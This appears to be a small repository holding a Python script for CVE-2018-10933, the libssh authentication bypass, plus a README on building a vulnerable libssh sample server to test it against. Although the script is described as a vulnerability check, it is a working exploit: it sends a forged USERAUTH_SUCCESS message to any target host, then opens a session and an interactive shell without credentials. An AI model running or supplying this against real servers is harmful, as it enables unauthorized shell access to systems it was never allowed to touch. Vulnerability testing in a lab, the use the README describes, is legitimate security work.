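├── .gitattributes
├── CVE-2018-10933.py
├── README.md
└── requirements.txt

/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto

--------------------------------------------------------------------------------
/CVE-2018-10933.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# coding: utf-8
"""Check whether an SSH server is affected by CVE-2018-10933.

The script completes the SSH transport handshake, then sends a
USERAUTH_SUCCESS message from the client side and asks for a session
channel and a shell. A server that grants both has accepted a message
only the server should ever emit, i.e. it skipped authentication.
The remedy on an affected host is a libssh build that carries the fix
for this CVE.
"""

import sys
import socket
import argparse
import logging

import paramiko
from paramiko.ssh_exception import SSHException


logger = logging.getLogger("CVE-2018-10933")


def main(hostname="127.0.0.1", port=22):
    """Run the check against one host and report the outcome.

    Args:
        hostname: Host name or address of the SSH server to check.
        port: TCP port the SSH server listens on.

    Returns:
        0 when the server granted a session channel and a shell without
        authentication (the server is affected), 1 when the TCP
        connection failed or paramiko raised SSHException.
    """
    # Enabling Debug logging
    logging.basicConfig(level=logging.DEBUG)

    try:
        # Log the port actually in use; the check is not limited to 22.
        logger.debug("Validating TCP/%d reachability.", port)
        sock = socket.create_connection((hostname, port))
    except socket.error:
        print('[-] Connecting to host failed. \nPlease check the specified host and port')
        return 1

    # instantiate transport
    transport = paramiko.transport.Transport(sock)

    try:
        logger.debug("Attempting to start SSH client.")
        transport.start_client()

        logger.debug("Sending USERAUTH_SUCCESS message.")
        message = paramiko.message.Message()
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        # _send_message is a private paramiko API; requirements.txt pins
        # the paramiko version this was written against.
        transport._send_message(message)

        logger.debug("Attempting to open an SSH session.")
        cmd_channel = transport.open_session()
        logger.debug("Attempting to invoke a TTY shell.")
        cmd_channel.invoke_shell()
    except SSHException as e:
        # NOTE(review): a server that rejects the request is expected to
        # end up here as well - confirm against a patched build.
        print('SSH Exception: {}'.format(e))
        return 1
    finally:
        # Always release the transport (and the socket it wraps) instead
        # of leaving the connection open until interpreter exit.
        transport.close()

    print('[!] Session and shell were granted without authentication: '
          'the server is affected by CVE-2018-10933.')
    return 0


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="libssh Authentication Bypass (CVE-2018-10933)")

    parser.add_argument('hostname', help='target', type=str)
    parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int)

    args = parser.parse_args()

    # Propagate the result so callers and scripts can read the exit status.
    sys.exit(main(**vars(args)))

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2018-10933
To test this code:
- Get a vulnerable version of libssh from the homepage: https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
- Uncompress and build it, then go to the example directory; it contains a simple sshd server built on libssh, named samplesshd-cb.

Run this simple sshd with the command:
$ samplesshd-cb 127.0.0.1 -p 2222

- Run my code; the output will be:
Allocated session channel
Allocated shell
This means that I can bypass authentication and spawn a shell without any credentials.
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
paramiko==2.4.2
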
--------------------------------------------------------------------------------